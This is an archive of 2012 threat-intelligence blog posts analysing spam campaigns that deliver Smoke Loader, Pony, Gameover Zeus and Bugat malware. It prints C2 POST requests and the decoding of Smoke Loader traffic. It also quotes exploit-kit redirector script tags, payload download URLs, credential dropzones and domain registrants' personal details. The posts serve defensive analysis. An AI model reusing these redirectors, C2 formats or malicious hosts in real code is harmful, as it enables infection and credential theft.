Monthly Archives: March 2012

Court Notification

On 2012-03-29 via Cisco’s Security Intelligence Operations, we observed an interesting spam sample with the subject line “Court is aCourt notification”. This spam sample had the following body text,

Notice!

The company “New Balance” has sued you for sending spam.
A copy of the lawsuit is attached to the letter,

Thank you.
U.S. Legal Support

Oh, the irony! A spam sample threatening legal action in response to … spamming!

Anywho, the observed spam sample contained the following malicious attachment:

File: Lawsuit_From_Legal Support_22nd_of_March.exe
Size: 58368
MD5: FC1DCCE6644E425C7C68CCCCBAFCE8B6

This sample installed itself in the following location C:\Documents and Settings\Administrator\Application Data\A11519.exe.

When executed in a lab environment this sample initiated a connectivity check to http://www.google.com. The sample then connected to a command and control server at beaufortseaa139.ru via the following POST request:

POST /qad/index.php HTTP/1.0
User-Agent: Mozilla/4.0
Host: beaufortseaa139.ru
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 20

smk=AmFvZj9lZ3ZlcGNg

This POST request mirrors the traffic pattern seen in our earlier blog American Airlines Ticket Attachment. Thats right, this sample is indeed another Smoke Loader variant. Our friends over at the Tracking Cybercrime blog have a good blog post detailing how Smoke Loader is marketed and sold in the underground.

Smoke Loader samples are clearly identifiable by the ‘smk=’ string observed in the POST data sent to the command and control server. The above POST data smk=AmFvZj9lZ3ZlcGNg is clearly encoded. As established in our earlier blog this data can be decoded via a two step process. First the data must be base64 decoded. This step gives us the following output:

AmFvZj9lZ3ZlcGNg >> base64 decodes to >> .aof?egvepc`.

Now, if we take the hex output of our base64 decoding operation we get a result of 02616F663F65677665706360.

Note that the first character of the text output of the decoding operation is ‘.’ or a null character. A null character in hex should be ’00’. As the first byte of our hex output is ’02’ we can then assume that a simple XOR decoding operation with the key 0x02 should reveal the plaintext POST data.

02616F663F65677665706360 >> 0x02 XOR decodes to >> cmd=getgrab

The POST request returns the following encoded file with the following properties:

File: 198
Size: 436228
MD5: ED113B12304243E7F532B370548A2D1C

This encoded file is a grabber designed to steal password from various FTP, instant messaging, mail, and web browsers.

This Smoke Loader variant then sends the following data via a POST request to beaufortseaa139.ru/qad/index.php

smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9DQzE1MTtAQUZHM0A0RzQzMzYxOzU7NUBDMjE3OzExMUNAQzMzNzM7JHJtcHY/MTM7OzU=

Using the same process detailed above we see that this string decodes to:

.cmd=getsocks&login=AA3739BCDE1B6E611439797BA0359333ABA11519&port=31997

This command downloads a SOCK proxy.

The next POST to beaufortseaa139.ru/qad/index.php includes the following string:

smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0NDMTUxO0BBRkczQDRHNDMzNjE7NTs1QEMyMTc7MTExQ0BDMzM3MzskcWduPzA6b2MkdGdwPzcsMyRga3ZxPzI=

This decodes to:

.cmd=getload&login=AA3739BCDE1B6E611439797BA0359333ABA11519&sel=28ma&ver=5.1&bits=0

The ‘getload’ command asks the control server how many secondary payloads it should download. The ‘login’ parameter appears to be a unique identifier specific to the particular victim. The ‘sel’ parameter appears to be an identifier for the particular Smoke Loader campaign associated with this spam campaign. The ’28ma’ string likely represents the date of March 28. The ‘ver’ parameter appears to identify the OS of the infected victim.

The command and control server at  beaufortseaa139.ru returns the following response ‘Smk4’ indicating that the victim should download 4 additional files.

The victim then downloads the following files:

http://www.theoldpalmerhouse.com/orderspro/template/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.theoldpalmerhouse.com/orderspro/template/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

http://www.maliks.com/images/1.exe
Size: 317952
MD5: 0CAE2FE5AF5AB63A62DD7A2C9E676C5C

http://www.maliks.com/images/doc.exe
Size: 599040
MD5: 709CC1AC4D7743E20BB3FB73E7475A78

Note that the files hosted at theoldpalmerhouse.com and maliks.com are identical. This duplication of effort is likely carried to increase the chances that these secondary payloads are successfully installed.

The payload doc.exe is a doc stealer. It harvests the victim machine for .doc and .xls files. Stolen files are ex-filtrated to 91.201.4.62 over port 8000. This is the same IP used in the  American Airlines Ticket Attachment post.

Advertisements

Schwab Report

The spam train kept rolling today. We saw another interesting template on 2012-03-29 spoofing communications from Charles Schwab. The observed sample had a subject line of “Schwab Report”.

This malicious missive contained the following links:

http://gorilascountry.com.br/dbcrLxFh/index.html
http://www.chapliniana.com/a1UZ9Deb/index.html

These pages contained the following javascript redirectors:

<script type=”text/javascript” src=”http://shultzfamily.com/6bCo6tHS/js.js”></script&gt;
<script type=”text/javascript” src=”http://telefonspass24.de/w2ziooxT/js.js”></script&gt;
<script type=”text/javascript” src=”http://eawebagency.com.ar/6FtHNTPa/js.js”></script&gt;
<script type=”text/javascript” src=”http://gpatrol.com/XwWWQjzf/js.js”></script&gt;
<script type=”text/javascript” src=”http://rregenttours.com/fZAALpHW/js.js”></script&gt;

These javascripts redirect victims to a Blackhole Exploit kit at http://88.85.99.44:8080/showthread.php?t=8d80b8c3f87a9538. Note this is the same exploit kit seen in the Apple Store-themed spam campaign.

This kit dropped a Pony downloader with the following properties:

File: contacts.exe
Size: 150569
MD5: 6DD2CB441698AF52A35FDC5388B6C387

This Pony downloader was configured to send stolen FTP credentials to the following dropzones:

http://50.56.208.113:8080/pony/gate.php
http://83.174.131.142:8080/pony/gate.php

The Pony downloader was also configured to download a Gameover Zeus variant from the following locations:

http://roosevelt.edu.ec/rxnUJD.exe
http://harris-tuban-bali.com/ZZKyoGUd.exe

This Gameover Zeus variant had the following properties:

File: rxnUJD.exe
Size: 319528
MD5: 3BD6BD0EE4C2FAF78C23FC41D87FBE5E

Like all recent Zeus variants, this Gameover variant was signed with a self-certificate digital certificate:

 

This Gameover variant had a botid of “rnato30”.

Thank you for your order

On 2012-03-29 we observed an Apple Store-themed spam. The observed sample had a subject line of “Thank you for your order” and the following text:

Dear Customer,

Thank you for shopping at Apple Store.

Here is a notice that your Order Number: W259985718 has been successfully charged to your credit card for 4,200.10 USD.

Please CLICK HERE to see your ORDER.

Your Apple Store Customer Service Team

This email contained a link to www.horizontefc.com.br/y2yMPUY4/index.html. Hmm, that pattern definitely looks familiar, right? It sure is ..

Predictably, the malicious link contained the following html code with the request javascript redirects:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://telefonspass24.de/w2ziooxT/js.js”></script&gt;
<script type=”text/javascript” src=”http://gpatrol.com/XwWWQjzf/js.js”></script&gt;

These javascripts redirected victims to a Blackhole Exploit kit at http://88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff.

This Blackhole Exploit unfortunately contained an upgraded Java Exploit (CVE-2012-0507). The malicious .jar file dropped by this kit had the following properties:

File: Pol.jar
Size: 14765
MD5: 8E300391CB3011ED76390C021E20F728

The kit then dropped the following Pony downloader:

File: readme.exe
Size: 150569
MD5: C1D691E2FCE076E58463DB5F5DF441CA

The Pony downloader was configured to send stolen FTP credentials to the following dropzones:

http://50.56.208.113:8080/pony/gate.php
http://83.174.131.142:8080/pony/gate.php

The Pony downloader then downloaded a Gameover Zeus variant from the following locations:

http://fragmanist.com/ngjYq.exe
http://genxlogistics.com/wE68.exe

This Zeus variant had the following properties:

Size: 319528
MD5: A374A4151C893BA731833E60655FAD26

This Zeus variant had a botid of “NR29”.

USPS Delivery Confirmation – Failed 64885492

Attachment: UPS_id1086785803.htm

UPS_id1086785803

Encoded JS in spam attachment redirects victim to a Phoenix Exploit kit at sisfshsdofhidd[.]ru:8080 /navigator/jueoaritjuir.php hosted at IP addresse(s):

78.83.233.242
125.19.103.198
41.66.137.155
41.168.5.140
61.187.191.16
62.85.27.129
180.235.150.72
202.143.147.35
202.149.85.37
210.56.23.100
210.56.24.226
210.109.108.210
211.44.250.173
216.24.194.2
219.94.194.138

Phoenix controller then drops a PDF exploit CVE-2010-0188 from the sisfshsdofhidd[.]ru:8080 /navigator/alisgtypezfq.pdf.

This PDF file had the following properties:
Name: alisgtypezfq.pdf
Size: 13,233 bytes
MD5: ed5d2236be495b79d3fcc1d28acaabb0

The PDF exploits CVE-2010-0188 and was detected by 29 of 43 AV vendors on VirusTotal.

Successful exploitation will then redirect victims to phfhshdjsjdppns[.]su:8080 /navigator/frf3.php?i=8. This will download a Bugat/Feodo variant with the following properties:

File: dsarcubqinhsjqkugsbm.exe
MD5: 20de62566248864be3b0e413b332d731
Size: 86,016 bytes
Timestamp: 2011:03:25 06:01:22+01:00

It receives its configuration file from a command and control server at nolwzyzsqkhjkqhomc[.]ru:8080 /rwx/B1_3n9/in/. This domain is hosted on a fast flux infrastructure at the following IP addresses:

74.117.62.130
74.208.14.131
81.30.160.7
83.170.91.152
85.214.204.32
87.204.199.100
88.190.22.72
89.31.145.154
91.121.109.139
94.20.30.91
112.78.124.115
173.224.220.2
199.71.213.72

Note that almost for 3 weeks sticking to same URI scheme for Phoenix landing page and payload page, Bugat/Feodo spam campaign now changes URI schemes:

from /images/aublbzdni.php to /navigator/jueoaritjuir.php
from /images/jw.php?i= to /navigator/frf3.php?i=

Your Bill Is Now Available

We saw a return of Verizon Wireless-themed spam today. The sample in question had a subject line of “Your Bill Is Now Available” and was sent from a Cutwail spambot at 86.120.45.80.

This sample had the following malicious links:

casinhajoia.com.br/CvBvr8r9/index.html
coastcruises.com.au/nS9X51yA/index.html
ftp.chirvancontract.gr/K7qjpRQ7/index.html
enil1.home.pl/nS9X51yA/index.html
ftp.bobstudio.com.hk/LgBXz0BV/index.html

These malicious links contained the following html code:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://colecoesearte.com.br/Kypp5Enk/js.js”></script&gt;
<script type=”text/javascript” src=”http://rafaeltezelli.com.br/G1GCPjut/js.js”></script&gt;

These javascript redirectors in turn bounced victims to a Blackhole Exploit kit at wildestant.com/showthread.php?t=d7ad916d1c0396ff.

Vulnerable victims directed to the above URL at wildestant.com then downloaded a Pony downloader with the following properties:

File: about.exe
Size: 95785
MD5: 14D9C851566E0C66EF67E2C08E6866A7

This Pony downloader posted stolen FTP credentials to http://88.85.99.44:8080/pony/gate.php. The downloader was also configured to communicate with the following backup dropzones in the event the primary at 88.85.99.44 was unavailable. The backup drops were located at:

http://91.121.140.103:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony downloader was also configured to downloader a Gameover Zeus variant from the following locations:

http://gnarlybuys.info/LMbir.exe
http://karinasadvertising.com/vXFEiixu.exe
http://mancomunidadcentro.org.bo/wN7iM.exe
http://100s.pl/jQnoeUC.exe

This Gameover variant had the following properties:

Size: 262696
MD5: B818C5240F3D45A123F2A497ACA8BEA1

This Gameover variant sent stolen data to drops zones at:

188.230.92.97:15043
93.177.168.141:16115

Web injects were downloaded from 93.177.168.141:16115.

Note, we also observed other blackhole exploit kits at:

184.82.202.46
69.164.199.162

 

UPS notify!

Subject: UPS notify
Attachment: parcel information.zip
From: PameliaBaffuto@ups.com

UPS notify
The email contained an attachment, parcel information.zip. Within this zip file was an executable with the following properties:

Name: Parcel information.exe
MD5: 0eadfb37c6664ae671d50787bc6b9e28
Size: 47,616 bytes

This payload is identified as a Gamarue downloader, a bot-controllerd worm. It injects itself into a new svchost.exe process. It then makes a self-copy at:
C:\WINDOWS\system32\wuauclt.exe

It adds a registry entry to ensure that the executable runs with each system restart:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
61309 – “C:\WINDOWS\system32\wuauclt.exe”

It then queries A records from Google’s public DNS (at IP address 8.8.4.4) for the domain napasaran[.]ru. This domain is hosted at IP addresses 89.73.38.241, 122.226.120.75, and 46.4.245.38.

The following network traffic is then observed:

POST /and/image.php HTTP/1.1
Host: napasaran.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Connection: close

7fZcUO9fCz1CU4gLIDPydspxXvW8fwi9fj19n/y4Ejx0etSTslkiXgbBYnPNFDZjW/a3dF2ZHHYV88BiixGbWA==

The infected computer then downloads and installs file napasaran.ru /test.exe. This is Security Shield rogue AV with the following properties:

MD5: 6ebb20543e371d72e807a62c897685d5
Size: 349,696 bytes
Timestamp: 2011:10:25 21:34:24+02:00

Security Shield AV

Next, it downloads apartmentsincorfu[.]gr /888.exe. This domain is hosted at 62.1.213.166.
This is a Wibimo spambot with the following properties:

MD5: 4162b8bceb3f4ceb97519f92e54c7f4c
Size: 27,136 bytes
Timestamp: 2011:11:21 11:45:32+01:00

It is installed as:

C:\WINDOWS\system32\ItpurnIfsoyy.dll
MD5: 03142b3993c6f8c530eb2a943173a20b
Size: 13,824 bytes

It connects to a C&C at grabsfakus[.]com:1001. This domain is hosted at 3 IP addresses: 78.159.111.122, 188.72.250.60 and 46.165.199.197. This domain was registered by andpushon@hotmail.com. Other domains registered by same mail ID:

– hydroliets.com
– lassogol.com
– aldrorist.com
– vizits-track.com

The spambot immediately began its spam campaign of “Best quality drugs” as shown below:

Subject: BUY NOW VIAGRA CIALIS !!!

USPS – Fast Delivery Shipping 1-4 day USA
Best quality drugs
Fast Shipping USA
Professional packaging
100% guarantee on delivery
Best prices in the market
Discounts for returning customers
FDA approved productas
35000+ satisfied customers

http://fauh.doctorpou.ru

USPS 02193131 delivers Bugat/Feodo

Subject:
DELIVERY CONFIRMATION FROM USPS 02193131
Attachment:
MYUPS_ID3M764824495.htm

USPS 02193131

The spam contained an encoded script which is used to redirect to a Phoenix Exploit kit at rehjsdgfjhskjksd[.]su:8080 /images/aublbzdni.php hosted at IP addresse(s):

78.83.233.242
83.238.208.55
125.19.103.198
41.168.5.140
61.187.191.16
62.85.27.129
199.71.214.180
200.169.13.84
202.143.147.35
202.149.85.37
210.56.23.100
210.56.24.226
210.109.108.210
211.44.250.173
219.94.194.138

First it drops a malicious flash file downloaded from rehjsdgfjhskjksd[.]su:8080 /images/gogpjljshzjma.swf. This flash file had  following properties.

File: gogpjljshzjma.swf
Size: 7,785 bytes
MD5: 4ae8dbe82d6340550beee51fd81095d7

This flash file carries CVE-2011-0611 exploited and was detected by 15 of 43 AV vendors on VirusTotal.

A malicious PDF file was also downloaded from rehjsdgfjhskjksd[.]su:8080 /images/xoypgqgvxzjudqk4.php. This PDF file had the following properties:

File: xoypgqgvxzjudqk4.php
Size: 13,151 bytes
MD5: 562612faccaab571660837f31f118042

The PDF file carries CVE-2010-0188 exploit and was detected by 28 of 43 AV vendors on VirusTotal.

If exploitation is successful, it redirects to pobolinovkans[.]su:8080 /images/jw.php?i=15, a Bugat/Feodo variant with the following properties is downloaded:

File: gsxohsapcpklkti.exe
MD5: e2149880d462b2bc29969ea1b1101ab0
Size: 88,576 bytes

Bugat/Feodo is installed as:
File: C:\Documents and Settings\Administrator\Application Data\KB00090109.exe. It had following properties:

MD5: a39ec23a671019ee07066c8aa94308cf
Size: 88,576 bytes
Timestamp: 2011:03:25 06:01:22+01:00

This Bugat/Feodo retrieved its configuration file/target list from a command and control server at nolwzyzsqkhjkqhomc[.]ru:8080 /rwx/B1_3n9/in/. This domain is hosted at the following IP addresses on a fast flux infrastructure:

79.101.30.15
94.20.30.91
94.23.30.157
83.170.91.152
85.214.204.32
88.190.22.72
91.121.7.5
91.121.91.111
112.78.124.115
124.124.212.172
173.224.220.224
178.162.154.214

Whack-a-mole

As we noted in our post “Your Bill Is Now Available”, the Blackhole kit used by the Verizon Wireless spam was first located at http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff.

The security research community was quick to spot this domain and have it taken down. Unfortunately, this did not stop the bad guys. Throughout the day we noted that the following Blackhole kits were used:

It appeared that almost as soon as one domain was taken down another domain took its place.

It is interesting to note the common theme used by some of these domains. In particular, the <color>cellular.com/org naming convention.

The domains browncellular.com, cyancellular.com and whitecellular.org  were registered on 22-mar-2012

The domain browncellular.com was registered to:

Renee Fabian clarelam@primasia.com
2840 Center Port Circle
Pompano Beach
FL
33064
US

The domains cyancellular.com and whitecellular.org (note the same email address clarelam@primasia.com):

jeffrey vaughn
jeffrey vaughn (clarelam@primasia.com)
+1.2524320178 ext
Fax: +1. ext
1000 facet road
henderson, NC
US

The domains slickidian.com and slickcurve.com were both registered on 13-mar-2012 to the following:

Peter Bousun abcdub@hathway.com
40 Frontage Rd
08551 ringoes
United States
Tel: +1.6093970078

Your Bill Is Now Available

Another day and another new spam template. We picked a Verizon Wireless themed spam campaign. The sample we studied had the subject line “Your Bill Is Now Available”.

The observed spam sample contained the following malicious links:

These pages all contained the following html code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://muttonheadcollective.com/XvLBzokA/js.js”></script&gt;
<script type=”text/javascript” src=”http://auto-escolas.com/TfFQ7r6J/js.js”></script&gt;
<script type=”text/javascript” src=”http://rgexcel.com/CPD4MoEs/js.js”></script&gt;
<script type=”text/javascript” src=”http://turkwebalan.com/oUvuQ0b7/js.js”></script&gt;
<script type=”text/javascript” src=”http://vita-shop.hu/dSSjc0ag/js.js”></script&gt;
<script type=”text/javascript” src=”http://wilbrahamweddings.co.uk/qsTCVQXM/js.js”></script&gt;
<script type=”text/javascript” src=”http://www.bestcar.ee/0AfKWVDW/js.js”></script&gt;
<script type=”text/javascript” src=”http://www.unimoveis.net/jW57W6aZ/js.js”></script&gt;

During our initial analysis these javascript redirectors bounced victims to a Blackhole Exploit kit at http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a Pony downloader with the following properties:

File: info.exe
Size: 118809
MD5: 99FAB94FD824737393F5184685E8EDF2

This Pony downloader  hijacked FTP credential and sent them to the following dropzone http://176.28.18.135:8080/pony/gate.php. This Pony variant was also configured to send stolen FTP credentials to the following backup dropzones if the primary at 176.28.18.135 was unavailable:

The Pony downloader then grabbed the same Gameover Zeus variant from any of the following locations:

This Gameover Zeus variant had the following properties:

Size: 306712
MD5: 86A548CADA5636B4A8ED7DE5F654FF96

The Gameover Zeus variant was configured to download its configuration file from the following peers via UDP:

27.119.46.174:22985
94.66.81.228:15663
94.203.147.11:20599
94.53.198.35:24596
68.150.204.237:16150
144.122.8.23:16622
99.190.137.80:12109
99.169.224.231:22266
190.26.120.90:22952
201.171.193.38:21552
175.141.221.126:24400
91.179.41.185:15941
79.115.226.238:14247
87.126.224.174:11314
82.131.141.80:27735
72.199.188.132:25142
165.228.237.204:17223
92.241.134.103:26870
151.40.245.8:19197
78.179.68.249:26051

This Zeus variant had a botid of NR22 and sent keylogged data to the following dropzone 84.109.164.131:23440/index.php.

WellsFargo – CEO Portal Statement & Notice Event

Subject:
CEO Portal Statements & Notices Event

URLs:
instafxrebatebandung[.]com/xJgSPZmH/index.html
neelhitech[.]com/qawcXa3B/index.html

WellsFargo-03212012

The text ‘View the details of this transaction online’ contain hyperlinks to compromised websites as shown above. These pages contains no content but only 5 JS:

muzee[.]org/aYYifF1v/js.js
renneaviamentos.com[.]br/u4G9ZTQb/js.js
nowshahr118[.]com/v08jzs2k/js.js
pabloalcalde[.]com/HdU03z00/js.js
posadaeltoreno[.]com/93aHAFsx/js.js

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 209.59.217.101:
document.location=’hxxp://closteage.com/showthread.php?t=d7ad916d1c0396ff’;

It first droppes Pony downloader from the following location:
closteage[.]com /q.php?f=ba33e&e=2

File: readme.exe
MD5: 659382f4192ef5070016b996e94b4646
Size: 2,83,160 bytes

Pony downloader posts to its dropzone at 176.28.18.135 /pony/gate.php. It was also configured to downloads following 4 files, all of them are same Gameover Zeus payloads:

1. derya34[.]com/M7R7.exe
2. http://www.procontracts.co[.]za/dnhoLD.exe
3. alimujtaba.purelogics[.]info/Jq3v.exe
4. http://www.e-gaming[.]cz/qNrkMGD.exe

It then installs Zeus in %APPDATA% which had following properties:

File: uxnab.exe
MD5: 5d4fabfef89a31dd87834a8d714f1323
Size: 2,83,160 bytes
Other: This file is digitally signed by ‘5r6Io0OJu3L2’
Company Name: Twain Working Group
File Description: Twain.dll Client’s 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:10:11 15:07:46+02:00

This Gameover Zeus payload ex-filtrated stolen data to dropzone at 188.159.215.128:26650 /index.php.
This payload had a bot id of “NR21″ cid of “3005″. Webinjects were pulled from the same proxy at 87.97.164.223:22005.